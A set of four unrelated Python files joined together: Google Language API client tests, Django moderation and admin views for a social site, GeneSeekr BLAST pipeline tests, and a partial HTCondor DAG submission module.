        expected_request = language_service_pb2.AnalyzeEntitySentimentRequest(
            document=document
        )
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_analyze_entity_sentiment_exception(self):
        """analyze_entity_sentiment propagates transport-level errors to the caller."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup request
        document = {}

        with pytest.raises(CustomException):
            client.analyze_entity_sentiment(document)

    def test_analyze_syntax(self):
        """analyze_syntax returns the canned response and sends exactly one request."""
        # Setup Expected Response
        language = "language-1613589672"
        expected_response = {"language": language}
        expected_response = language_service_pb2.AnalyzeSyntaxResponse(
            **expected_response
        )

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup Request
        document = {}

        response = client.analyze_syntax(document)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = language_service_pb2.AnalyzeSyntaxRequest(document=document)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_analyze_syntax_exception(self):
        """analyze_syntax propagates transport-level errors to the caller."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup request
        document = {}

        with pytest.raises(CustomException):
            client.analyze_syntax(document)

    def test_classify_text(self):
        """classify_text returns the canned response and sends exactly one request."""
        # Setup Expected Response
        expected_response = {}
        expected_response = language_service_pb2.ClassifyTextResponse(
            **expected_response
        )

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup Request
        document = {}

        response = client.classify_text(document)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = language_service_pb2.ClassifyTextRequest(document=document)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_classify_text_exception(self):
        """classify_text propagates transport-level errors to the caller."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup request
        document = {}

        with pytest.raises(CustomException):
            client.classify_text(document)

    def test_annotate_text(self):
        """annotate_text sends both document and features in one request."""
        # Setup Expected Response
        language = "language-1613589672"
        expected_response = {"language": language}
        expected_response = language_service_pb2.AnnotateTextResponse(
            **expected_response
        )

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup Request
        document = {}
        features = {}

        response = client.annotate_text(document, features)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = language_service_pb2.AnnotateTextRequest(
            document=document, features=features
        )
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_annotate_text_exception(self):
        """annotate_text propagates transport-level errors to the caller."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup request
        document = {}
        features = {}

        with pytest.raises(CustomException):
            client.annotate_text(document, features)
| |
from filecmp import demo
from django.conf.app_template import admin
from django.contrib.auth.decorators import login_required
from django.contrib.messages.views import SuccessMessageMixin
from django.shortcuts import render
from django.utils.datetime_safe import datetime
from django.utils.decorators import method_decorator
from django.views.generic import ListView
from django.http import HttpResponseRedirect, JsonResponse
from buzzit_messaging.views import __send_system__message__
from buzzit_models.models import *
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse, reverse_lazy
import django.contrib.messages as messages
from django.views.generic import ListView, DetailView
from buzzit_models.models import *
from django.contrib.auth.decorators import login_required
import json
from django.core.mail import send_mail
@login_required
def report_user(request, user_id):
    """
    Let the current user report another user with a non-empty reason.

    POST: validate the reason, store a UserReport and redirect home.
    GET: render the report form for the reported user's profile.

    :param request: the current HttpRequest
    :param user_id: primary key of the user being reported
    :return: HttpResponse (redirect on POST or error, rendered form on GET)
    """
    if request.method == "POST":
        try:
            reported_user = User.objects.get(pk=user_id)
        except ObjectDoesNotExist:
            messages.error(request, "Der Benutzer existiert nicht.")
            return HttpResponseRedirect(reverse_lazy("home"))
        # BUG FIX: the original re-tested request.method == "POST" inside the
        # POST branch, wrapped a plain attribute assignment in a pointless
        # try/except ObjectDoesNotExist, and crashed with AttributeError when
        # no text was posted. Validate the reason before building the report.
        report_text = request.POST.get("text", "")
        if len(report_text) < 1:
            messages.error(request, "Text zum Benutzermelden ist zu geben")
            return HttpResponseRedirect(reverse_lazy("home"))
        report_message = UserReport()
        report_message.text = report_text
        report_message.creator = request.user
        report_message.created = datetime.now()
        report_message.reported_user = reported_user
        report_message.save()
        messages.info(request, "Sie haben den <User:%s> Benutzer gemeldet" % reported_user)
        return HttpResponseRedirect(reverse_lazy('home'))
    try:
        reported_profile = Profile.objects.get(pk=user_id)
    except ObjectDoesNotExist:
        messages.error(request, "Der Benutzer existiert nicht.")
        return HttpResponseRedirect(reverse_lazy("home"))
    return render(request, "logged_in/report_user.html", {"profile": reported_profile})
class UserReportDetailsView(SuccessMessageMixin, ListView):
    """
    Display the report text and the reported user.
    """
    model = UserReport
    template_name = "logged_in/user_report_details.html"

    def get_queryset(self):
        """Return the report (as a one-element queryset) ordered by creation time."""
        report_id = self.kwargs.get("report_id")
        try:
            return UserReport.objects.filter(pk=report_id).order_by("created")
        except ObjectDoesNotExist:
            # NOTE(review): filter() never raises ObjectDoesNotExist and
            # ListView ignores a redirect returned from get_queryset — this
            # branch is effectively dead; kept for behavioural parity.
            messages.error(self.request, "Benutzer existiert nicht")
            return HttpResponseRedirect(reverse_lazy("admin_frontpage"))

    def get_context_data(self, **kwargs):
        """Add the report and the reported user's profile to the template context."""
        context = super(UserReportDetailsView, self).get_context_data(**kwargs)
        report_id = self.kwargs.get("report_id")
        try:
            report = UserReport.objects.get(pk=report_id)
        except ObjectDoesNotExist:
            # NOTE(review): get_context_data is expected to return a dict; a
            # redirect here will break template rendering. Consider Http404.
            messages.error(self.request, "Benutzer existiert nicht")
            return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
        reported_user_profile = report.reported_user.profile
        context["profile"] = reported_user_profile
        context["userreport"] = report
        return context

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        # BUG FIX: the original passed `args, kwargs` positionally, handing the
        # tuple and the dict to dispatch as two positional arguments instead of
        # unpacking them; URL kwargs such as report_id were silently mangled.
        return super(UserReportDetailsView, self).dispatch(request, *args, **kwargs)
class AdminFrontpageView():
    # NOTE(review): empty placeholder; the admin front page is actually served
    # by the adminFrontPage() function view below.
    pass
@login_required
def adminFrontPage(request):
    """
    Show all open user reports and post reports to a superuser.

    Non-superusers get an error message and are redirected home.

    :param request:
    :return:
    """
    if not request.user.is_superuser:
        messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
        return HttpResponseRedirect(reverse("home"))
    userreports = UserReport.objects.filter(closed=False).all()
    postreports = CircleMessageReport.objects.filter(closed=False).all()
    context = {"user_reports": userreports, "post_reports": postreports}
    return render(request, "logged_in/admin_dashboard.html", context)
class MessageReportDetailsView(DetailView):
    """Detail page for a single reported circle message (login required)."""
    model = CircleMessageReport
    slug_field = "id"
    template_name = "logged_in/post_report_details.html"

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        # BUG FIX: unpack *args/**kwargs; the original passed the tuple and
        # dict as two positional arguments to the parent dispatch.
        return super(MessageReportDetailsView, self).dispatch(request, *args, **kwargs)
@login_required
def AdminOverviewView(request):
    """
    List all superusers; non-superusers are redirected home with an error.

    :param request:
    :return:
    """
    if not request.user.is_superuser:
        messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
        return HttpResponseRedirect(reverse("home"))
    # Dead `adminlist = []` initialisation removed; the queryset is assigned directly.
    adminlist = User.objects.filter(is_superuser=True)
    return render(request, "logged_in/admin_list.html", {"userlist": adminlist})
@login_required
def delete_reported_post(request, report_id):
    """
    Delete a reported message (admin only); any answers to the reported
    message are deleted together with it, then the report is closed.
    TODO was ist, wenn eine Nachricht rebuzzed wurde

    :param request:
    :param report_id: primary key of the CircleMessageReport
    :return:
    """
    try:
        report = CircleMessageReport.objects.get(pk=report_id)
    except ObjectDoesNotExist:
        messages.error(request, "Der Report existiert nicht")
        return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
    if not request.user.is_superuser:
        messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
        return HttpResponseRedirect(reverse("home"))
    # Delete the reported post together with all of its answers.
    post_to_del = report.reported_message
    answers = Circle_message.objects.filter(answer_to=post_to_del)
    answers.delete()
    post_to_del.delete()
    report.issuer = request.user
    report.valid = True
    report.closed = True
    # BUG FIX: the report state was never persisted — without save() the
    # report stayed open and reappeared on the admin dashboard.
    report.save()
    messages.success(request, "Die Nachrichte wurde erfolgreich geloescht")
    return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
@login_required
def promote_user_to_admin(request, user_id):
    """
    Grant superuser rights to an existing, active user (admin only).

    :param request:
    :param user_id: primary key of the user to promote
    :return:
    """
    try:
        user_to_promote = User.objects.get(pk=user_id)
    except ObjectDoesNotExist:
        messages.error(request, "Der Benuzer existiert nicht")
        return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
    if not request.user.is_superuser:
        messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
        return HttpResponseRedirect(reverse("home"))
    if not user_to_promote.is_active:
        messages.info(request, "Der Benutzer ist deaktiviert")
        return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
    user_to_promote.is_superuser = True
    user_to_promote.save()
    messages.info(request, "Der Benutzer %s ist als AdminUser hinzugefuegt" % (user_to_promote.username,))
    return HttpResponseRedirect(reverse_lazy("admins_overview"))
@login_required
def demote_admin_to_user(request, user_id):
    """
    Revoke superuser rights from an existing admin user (admin only).

    :param request:
    :param user_id: primary key of the admin to demote
    :return:
    """
    try:
        admin_to_demote = User.objects.get(pk=user_id)
    except ObjectDoesNotExist:
        messages.error(request, "Der Benutzer existiert nicht")
        return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
    if not request.user.is_superuser:
        messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
        return HttpResponseRedirect(reverse("home"))
    if not admin_to_demote.is_superuser:
        messages.error(request, "Der Benutzer ist kein Admin ")
        return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
    admin_to_demote.is_superuser = False
    admin_to_demote.save()
    messages.info(request, "Die Adminrechte von dem Benutzer wird entziehen")
    return HttpResponseRedirect(reverse_lazy("admins_overview"))
@login_required
def report_message(request, message_id):
    """
    Report a circlemessage with given <message_id>, if that exists.

    If the message does not exist, an error is shown and the user is
    redirected home. On POST the report is created and saved when a reason
    (report.text) was given; without a reason an error is shown instead.
    On GET the report form is rendered.

    :param request:
    :param message_id:
    :return:
    """
    try:
        reported_message = Circle_message.objects.get(pk=message_id)
    except ObjectDoesNotExist:
        # BUG FIX: narrowed from a blanket `except Exception`, which reported
        # every programming error as a missing message; this now matches the
        # ObjectDoesNotExist handling used everywhere else in this module.
        messages.error(request, "Die Nachricht existiert nicht")
        return HttpResponseRedirect(reverse("home"))
    if request.method == "POST":
        report = CircleMessageReport()
        report.reported_message = reported_message
        report.text = request.POST.get("text", False)
        if not report.text or len(report.text) < 1:
            messages.error(request, "Keine Begruendung angegeben")
            return HttpResponseRedirect(reverse("home"))
        report.creator = request.user
        report.created = datetime.now()
        report.save()
        messages.success(request, "Nachricht wurde gemeldet")
        return HttpResponseRedirect(reverse("home"))
    reported_profile = Profile.objects.get(pk=reported_message.creator.pk)
    return render(request, "logged_in/report_post.html",
                  {"profile": reported_profile, "circlemessage": reported_message})
@login_required
def ban_user(request, user_id):
    """
    Deactivate (ban) a user and e-mail them the reason.
    TODO: provide the banned user information on how to contact an admin.

    :param request:
    :param user_id: primary key of the user to deactivate
    :return:
    """
    try:
        user_to_be_ban = User.objects.get(pk=user_id)
    except ObjectDoesNotExist:
        messages.error(request, "Der Benutzer existiert nicht")
        return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
    if not (request.user.is_superuser):
        messages.error(request, "Sie haben nicht die ntigen Zugangsrechte!")
        return HttpResponseRedirect(reverse("home"))
    if not (user_to_be_ban.is_active):
        messages.info(request, "Der Benutzer ist bereits deaktiviert")
        return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
    # NOTE(review): the reason is read from the query string rather than POST
    # data — confirm that the ban form really submits via GET.
    message_for_ban = request.GET.get("text", False)
    user_to_be_ban.is_active = False
    user_to_be_ban.save()
    # NOTE(review): the '%s' placeholder in html_message is never filled in,
    # so the e-mail is sent with a literal "%s" where the reactivation link
    # should be — this needs a real format argument.
    send_mail("Deaktivieren dein Account", message="Grund zum Deaktivieren: '%s'" % message_for_ban,
              html_message="<html><h3>um Deinen Account zu wieder aktivieren, kontaktieren Sie bitte :</h3>" +
                           "<a href='%s'>Klicke hier um den Account wieder zu aktivieren!</a>." +
                           "</html>", from_email="AccountAktivierung@vps146949.ovh.net",
              recipient_list=(user_to_be_ban.email,))
    messages.info(request, "Der Benutzer ist deaktiviert")
    return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
@login_required
def setIgnoreReport(request, report_id):
    """
    Mark a report as reviewed-and-ignored (admin only): the report is closed,
    flagged invalid and stamped with the acting admin as issuer.

    :param request:
    :param report_id: primary key of the Report
    :return:
    """
    if not request.user.is_superuser:
        messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
        return HttpResponseRedirect(reverse("home"))
    try:
        report = Report.objects.get(pk=report_id)
    except ObjectDoesNotExist:
        # BUG FIX: the original bare `except:` also swallowed SystemExit,
        # KeyboardInterrupt and programming errors; only a missing report
        # should be handled here.
        messages.error(request, "Report existiert nicht")
        return HttpResponseRedirect(reverse("admin_frontpage"))
    report.closed = True
    report.valid = False
    report.issuer = request.user
    report.save()
    messages.success(request, "Report wurde ignoriert")
    return HttpResponseRedirect(reverse("admin_frontpage"))
| |
#!/usr/bin/env python 3
from accessoryFunctions.accessoryFunctions import MetadataObject
from geneseekr.geneseekr import GeneSeekr
from geneseekr.blast import BLAST
import multiprocessing
from glob import glob
from time import time
import pytest
import os
# Directory containing this test module; used to locate the test data tree.
test_path = os.path.abspath(os.path.dirname(__file__))
__author__ = 'adamkoziol'
@pytest.fixture()
def variables():
    """Build a MetadataObject preconfigured for the resfinder test data set."""
    v = MetadataObject()
    datapath = os.path.join(test_path, 'testdata')
    v.sequencepath = os.path.join(datapath, 'aa_sequences')
    v.targetpath = os.path.join(datapath, 'databases', 'resfinder')
    v.reportpath = os.path.join(datapath, 'reports')
    v.cutoff = 70
    v.evalue = '1E-05'
    # All analysis toggles default to off; tests flip them as needed.
    for flag in ('align', 'unique', 'resfinder', 'virulencefinder'):
        setattr(v, flag, False)
    v.numthreads = multiprocessing.cpu_count()
    v.start = time()
    return v
def variable_update():
    """Rebuild the module-level ``method`` object from a fresh variables set."""
    global method
    # NOTE(review): this calls the pytest fixture functions directly; newer
    # pytest versions raise when fixtures are invoked outside collection.
    method = method_init(variables())
@pytest.fixture()
def method_init(variables, analysistype, program, align, unique):
    """Configure *variables* and build the module-level BLAST ``method`` object."""
    global method
    variables.analysistype = analysistype
    variables.program = program
    variables.align = align
    variables.unique = unique
    method = BLAST(variables)
    return method
# Module-level BLAST object shared by every test below (tblastn vs. resfinder).
# NOTE(review): calls the fixture functions directly at import time — this
# breaks under newer pytest versions.
tblastn_method = method_init(variables(), 'resfinder', 'tblastn', True, True)
def test_parser():
    """The resfinder target parser must find the beta-lactam database file."""
    assert os.path.basename(tblastn_method.targets[0]) == 'beta-lactam.tfa'


def test_combined_files():
    """The combined multi-FASTA target file must have been written."""
    assert os.path.isfile(tblastn_method.combinedtargets)


def test_strains():
    """At least one query strain file must exist on disk."""
    assert os.path.isfile(tblastn_method.strains[0])


def test_strain():
    """The expected query strain must be the first entry."""
    assert os.path.basename(tblastn_method.strains[0]) == 'amr_test.fasta'
def test_makeblastdb(variables):
    # Build the nucleotide BLAST database; ``.nsq`` is one of the files
    # makeblastdb emits for a nucleotide DB (tblastn searches nt targets).
    global geneseekr
    geneseekr = GeneSeekr()
    geneseekr.makeblastdb(fasta=tblastn_method.combinedtargets,
                          program=tblastn_method.program)
    assert os.path.isfile(os.path.join(variables.targetpath, 'combinedtargets.nsq'))
def test_variable_populate():
    # Cache folder/file/record lookups as module globals for later tests.
    global targetfolders
    global targetfiles
    global records
    targetfolders, targetfiles, records = \
        geneseekr.target_folders(metadata=tblastn_method.metadata,
                                 analysistype=tblastn_method.analysistype)
def test_targetfolders():
    assert os.path.basename(list(targetfolders)[0]) == 'resfinder'
def test_targetfiles():
    assert targetfiles[0] == tblastn_method.combinedtargets
def test_records():
    # A known resistance-gene record must be present in the parsed targets.
    assert records[targetfiles[0]]['ampH_2_HQ586946']
def test_tblastn(variables):
    # Run the tblastn search and confirm the raw report was written.
    global tblastn_report
    tblastn_method.metadata = geneseekr.run_blast(metadata=tblastn_method.metadata,
                                                  analysistype=tblastn_method.analysistype,
                                                  program=tblastn_method.program,
                                                  outfmt=tblastn_method.outfmt,
                                                  evalue=tblastn_method.evalue,
                                                  num_threads=tblastn_method.cpus)
    tblastn_report = os.path.join(variables.reportpath, 'amr_test_tblastn_resfinder.tsv')
    assert os.path.isfile(tblastn_report)
def test_enhance_report_parsing():
    # Re-write the raw BLAST output with a header row, then confirm the
    # first column is labelled 'query_id'.
    geneseekr.parseable_blast_outputs(metadata=tblastn_method.metadata,
                                      analysistype=tblastn_method.analysistype,
                                      fieldnames=tblastn_method.fieldnames,
                                      program=tblastn_method.program)
    # Use a context manager so the handle is closed (the original leaked an
    # open file object: ``open(...).readline()``).
    with open(tblastn_report) as report:
        header = report.readline()
    assert header.split('\t')[0] == 'query_id'
def test_tblastn_results():
    # Skip the header row, then check the percent-identity column of the
    # first data row meets a minimal sanity threshold.
    with open(tblastn_report) as blast_results:
        next(blast_results)
        data = blast_results.readline()
        results = data.split('\t')
        assert int(results[2]) >= 50
def test_blast_parse():
    # Parse the raw report into per-sample hit structures.
    tblastn_method.metadata = geneseekr.unique_parse_blast(metadata=tblastn_method.metadata,
                                                           analysistype=tblastn_method.analysistype,
                                                           fieldnames=tblastn_method.fieldnames,
                                                           cutoff=tblastn_method.cutoff,
                                                           program=tblastn_method.program)
    for sample in tblastn_method.metadata:
        assert sample.resfinder.queryranges['contig2'] == [[1, 264]]
def test_filter():
    # After filtering, every surviving hit must meet the identity cutoff.
    tblastn_method.metadata = geneseekr.filter_unique(metadata=tblastn_method.metadata,
                                                      analysistype=tblastn_method.analysistype)
    for sample in tblastn_method.metadata:
        assert sample.resfinder.blastlist[0]['percentidentity'] >= 70
def test_dict_create():
    # Result dictionaries are initialised on each sample.
    tblastn_method.metadata = geneseekr.dict_initialise(metadata=tblastn_method.metadata,
                                                        analysistype=tblastn_method.analysistype)
    for sample in tblastn_method.metadata:
        assert type(sample.resfinder.protseq) is dict
def test_report_creation():
    # Generate the ResFinder XLSX report (existence checked in next test).
    tblastn_method.metadata = geneseekr.resfinder_reporter(metadata=tblastn_method.metadata,
                                                           analysistype=tblastn_method.analysistype,
                                                           reportpath=tblastn_method.reportpath,
                                                           align=tblastn_method.align,
                                                           program=tblastn_method.program,
                                                           targetpath=tblastn_method.targetpath,
                                                           cutoff=tblastn_method.cutoff)
def test_report_existance():
    global geneseekr_report
    geneseekr_report = os.path.join(tblastn_method.reportpath, 'resfinder_tblastn.xlsx')
    assert os.path.isfile(geneseekr_report)
def test_report_row():
    # First (sorted) report row should be the blaOXA gene.
    for sample in tblastn_method.metadata:
        assert sorted(sample.resfinder.sampledata)[0][0] == 'blaOXA'
def test_parse_results():
    for sample in tblastn_method.metadata:
        assert sample.resfinder.blastresults['blaOXA_427_1_KX827604'] == 94.34
def test_aaseq():
    # Translated query sequence starts with the expected residues.
    for sample in tblastn_method.metadata:
        assert sample.resfinder.blastlist[0]['query_sequence'][:5] == 'MSRIL'
def test_fasta_create(variables):
    # Export the hit sequences as FASTA and verify the file plus its first
    # header line.
    global fasta_file
    geneseekr.export_fasta(metadata=tblastn_method.metadata,
                           analysistype=tblastn_method.analysistype,
                           reportpath=tblastn_method.reportpath,
                           cutoff=tblastn_method.cutoff,
                           program=tblastn_method.program)
    fasta_file = os.path.join(variables.reportpath, 'amr_test_resfinder.fasta')
    assert os.path.isfile(fasta_file)
    # Use a context manager so the handle is closed (the original leaked an
    # open file object: ``open(...).readline()``).
    with open(fasta_file, 'r') as fasta:
        header = fasta.readline().rstrip()
    assert header == '>amr_test_blaOXA_427_1_KX827604'
# Cleanup "tests": remove every artefact the suite created so reruns start
# from a clean slate. Order matters -- the report directory is removed last.
def test_combined_targets_clean():
    os.remove(tblastn_method.combinedtargets)
def test_makeblastdb_clean(variables):
    # Remove all BLAST database shards (combinedtargets.nsq/.nhr/.nin/...).
    databasefiles = glob(os.path.join(variables.targetpath, 'combinedtargets.n*'))
    for dbfile in databasefiles:
        os.remove(dbfile)
def test_remove_tblastn_report():
    os.remove(tblastn_report)
def test_remove_fasta_file():
    os.remove(fasta_file)
def test_remove_geneseekr_report():
    os.remove(geneseekr_report)
def test_remove_report_path():
    # rmdir only succeeds if the previous removals emptied the directory.
    os.rmdir(tblastn_method.reportpath)
| |
#!/usr/bin/env python
import os
import glob
import time
from . import logger
def checkdir(outfile):
    """Ensure the directory that will contain *outfile* exists.

    :param outfile: path to a file whose parent directory is required;
        a bare filename (no directory component) resolves to the cwd.
    """
    outdir = os.path.dirname(outfile)
    if outdir == '':
        outdir = os.getcwd()
    if not os.path.isdir(outdir):
        print('\nThe directory {} doesn\'t exist...'.format(outdir)
              + 'creating it...\n')
        # exist_ok guards against the TOCTOU race where another process
        # creates the directory between the isdir() check and makedirs().
        os.makedirs(outdir, exist_ok=True)
    return
class CondorExecutable(object):
    """Describes an executable to be run by HTCondor: its path, resource
    requests, queue count, and any extra submit-file lines."""
    def __init__(self, name, path, request_memory=None,
                 request_disk=None, queue=None, lines=None, verbose=0):
        self.name = str(name)
        self.path = str(path)
        self.request_memory = request_memory
        self.request_disk = request_disk
        self.queue = queue
        # Normalise ``lines`` to a fresh list (never share a mutable default)
        if lines is None:
            lines = []
        if isinstance(lines, str):
            lines = [lines]
        self.lines = lines
        # Set up logger
        self.logger = logger.setup_logger(self, verbose)
    def __repr__(self):
        output = 'CondorExecutable(name={}, path={}, request_memory={}, request_disk={}, n_lines={})'.format(
            self.name, self.path, self.request_memory, self.request_disk, len(self.lines))
        return output
    def add_line(self, line):
        """Append a single extra submit-file line (coerced to str)."""
        self.lines.append(str(line))
        self.logger.debug(
            'Added \'{}\' to lines for CondorExecutable {}'.format(str(line), self.name))
        return
    def add_lines(self, lines):
        """Append each entry of *lines*; a single string is accepted too."""
        if isinstance(lines, str):
            lines = [lines]
        try:
            for line in lines:
                self.add_line(line)
        except TypeError:
            # Narrowed from a bare ``except`` that converted *any* error
            # (even KeyboardInterrupt) into this TypeError.
            raise TypeError('add_lines() is expecting a list of strings')
        return
class CondorJob(object):
    """A single DAG node: an executable plus its argument list and
    parent/child dependency links."""
    def __init__(self, name, condorexecutable=None, verbose=0):
        self.name = str(name)
        self.condorexecutable = condorexecutable
        self.args = []
        self.parents = []
        self.children = []
        # Set up logger
        self.logger = logger.setup_logger(self, verbose)
    def __repr__(self):
        output = 'CondorJob(name={}, condorexecutable={}, n_args={}, n_children={}, n_parents={})'.format(
            self.name, self.condorexecutable.name, len(self.args),
            len(self.children), len(self.parents))
        return output
    def __iter__(self):
        # Iterating a job yields its argument strings.
        return iter(self.args)
    def add_arg(self, arg):
        """Append one argument string for this job."""
        self.args.append(str(arg))
        self.logger.debug(
            'Added \'{}\' to args for CondorJob {}'.format(str(arg), self.name))
        return
    def add_args(self, args):
        """Append each entry of *args* as an argument string."""
        try:
            for arg in args:
                self.add_arg(arg)
        except TypeError:
            # Narrowed from a bare ``except`` that masked unrelated errors.
            raise TypeError(
                'add_args() is expecting a list of argument strings')
        return
    def _hasparent(self, job):
        return job in self.parents
    def add_parent(self, job):
        """Register *job* as a parent; the inverse child link is added too."""
        # Ensure that job is a CondorJob
        if not isinstance(job, CondorJob):
            raise TypeError('add_parent() is expecting a CondorJob')
        # Don't bother continuing if job is already in the parents
        if self._hasparent(job):
            return
        # Add job to existing parents
        self.parents.append(job)
        self.logger.debug(
            'Added {} to parents for CondorJob {}'.format(job.name, self.name))
        # Add this CondorJob instance as a child to the new parent job
        job.add_child(self)
        return
    def add_parents(self, job_list):
        """Register every job in *job_list* as a parent."""
        try:
            for job in job_list:
                self.add_parent(job)
        except TypeError:
            # Narrowed from a bare ``except``; non-TypeErrors now propagate.
            raise TypeError('add_parents() is expecting a list of CondorJobs')
        return
    def _haschild(self, job):
        return job in self.children
    def add_child(self, job):
        """Register *job* as a child; the inverse parent link is added too."""
        # Ensure that job is a CondorJob
        if not isinstance(job, CondorJob):
            raise TypeError('add_child() is expecting a CondorJob')
        # Don't bother continuing if job is already in the children
        if self._haschild(job):
            return
        # Add job to existing children
        self.children.append(job)
        self.logger.debug(
            'Added {} to children for CondorJob {}'.format(job.name, self.name))
        # Add this CondorJob instance as a parent to the new child job
        job.add_parent(self)
        return
    def add_children(self, job_list):
        """Register every job in *job_list* as a child."""
        try:
            for job in job_list:
                self.add_child(job)
        except TypeError:
            # Narrowed from a bare ``except``; non-TypeErrors now propagate.
            raise TypeError('add_children() is expecting a list of CondorJobs')
        return
    def haschildren(self):
        return bool(self.children)
    def hasparents(self):
        return bool(self.parents)
class DagManager(object):
    """Collects CondorJobs, writes their submit scripts plus the DAG file,
    and hands everything to ``condor_submit_dag``."""
    def __init__(self, name,
                 condor_data_dir=None, condor_scratch_dir=None, verbose=0):
        self.name = str(name)
        self.condor_data_dir = condor_data_dir
        self.condor_scratch_dir = condor_scratch_dir
        self.jobs = []
        # Set up logger
        self.logger = logger.setup_logger(self, verbose)
    def __repr__(self):
        output = 'DagManager(name={}, n_jobs={})'.format(self.name,
                                                         len(self.jobs))
        return output
    def __iter__(self):
        return iter(self.jobs)
    def _hasjob(self, job):
        # Membership test used to keep self.jobs duplicate-free.
        return job in self.jobs
    def add_job(self, job):
        """Add a CondorJob to the DAG (duplicates are silently ignored)."""
        # Don't bother adding job if it's already in the jobs list
        if self._hasjob(job):
            return
        if isinstance(job, CondorJob):
            self.jobs.append(job)
        else:
            raise TypeError('add_job() is expecting a CondorJob')
        self.logger.debug(
            'Added {} to jobs for DagManager {}'.format(job.name, self.name))
        return
    def _get_executables(self):
        # Deduplicate executables shared by several jobs.
        executable_list = [job.condorexecutable for job in self.jobs]
        executable_set = set(executable_list)
        return executable_set
    def _make_submit_script(self, executable):
        """Write the HTCondor submit script for *executable* and record its
        path on the executable as ``submit_file``."""
        # Check that paths/files exist
        if not os.path.exists(executable.path):
            raise IOError(
                'The path {} does not exist...'.format(executable.path))
        for directory in ['submit_scripts', 'logs']:
            checkdir(self.condor_scratch_dir + '/{}/'.format(directory))
        for directory in ['outs', 'errors']:
            checkdir(self.condor_data_dir + '/{}/'.format(directory))
        jobID = self._getjobID(executable)
        condor_script = self.condor_scratch_dir + \
            '/submit_scripts/{}.submit'.format(jobID)
        lines = ['universe = vanilla\n',
                 'getenv = true\n',
                 'executable = {}\n'.format(executable.path),
                 'arguments = $(ARGS)\n',
                 'log = {}/logs/{}.log\n'.format(
                     self.condor_scratch_dir, jobID),
                 'output = {}/outs/{}.out\n'.format(
                     self.condor_data_dir, jobID),
                 'error = {}/errors/{}.error\n'.format(
                     self.condor_data_dir, jobID),
                 'notification = Never\n',
                 'queue \n']
        # Re-format lines if queue option specified
        if executable.queue:
            if not isinstance(executable.queue, int):
                raise TypeError('The queue option for CondorExecutable {} is {}, expecting an int'.format(
                    executable.name, executable.queue))
            lines[-1] = 'queue {}\n'.format(executable.queue)
            # With multiple queued processes, disambiguate the per-process
            # log/out/error files with $(Process).
            lines[4:7] = ['log = {}/logs/{}_$(Process).log\n'.format(self.condor_scratch_dir, jobID),
                          'output = {}/outs/{}_$(Process).out\n'.format(
                              self.condor_data_dir, jobID),
                          'error = {}/errors/{}_$(Process).error\n'.format(self.condor_data_dir, jobID)]
        # Add memory and disk requests, if specified
        if executable.request_memory:
            lines.insert(-2, 'request_memory = {}\n'.format(executable.request_memory))
        if executable.request_disk:
            lines.insert(-2, 'request_disk = {}\n'.format(executable.request_disk))
        # Add any extra lines to submit file, if specified
        if executable.lines:
            if isinstance(executable.lines, str):
                lines.insert(-2, executable.lines + '\n')
            elif isinstance(executable.lines, list):
                for line in executable.lines:
                    lines.insert(-2, line + '\n')
            else:
                raise TypeError('The lines option for CondorExecutable {} is of type {}, expecting str or list'.format(
                    executable.name, type(executable.lines)))
        with open(condor_script, 'w') as f:
            f.writelines(lines)
        # Add submit_file data member to job for later use
        executable.submit_file = condor_script
        return
    def _getjobID(self, executable):
        """Return a unique per-day job identifier, e.g. ``name_20240101_01``;
        the trailing counter is one past the number of existing submits."""
        jobID = executable.name + time.strftime('_%Y%m%d')
        othersubmits = glob.glob(
            '{}/submit_scripts/{}_??.submit'.format(self.condor_scratch_dir, jobID))
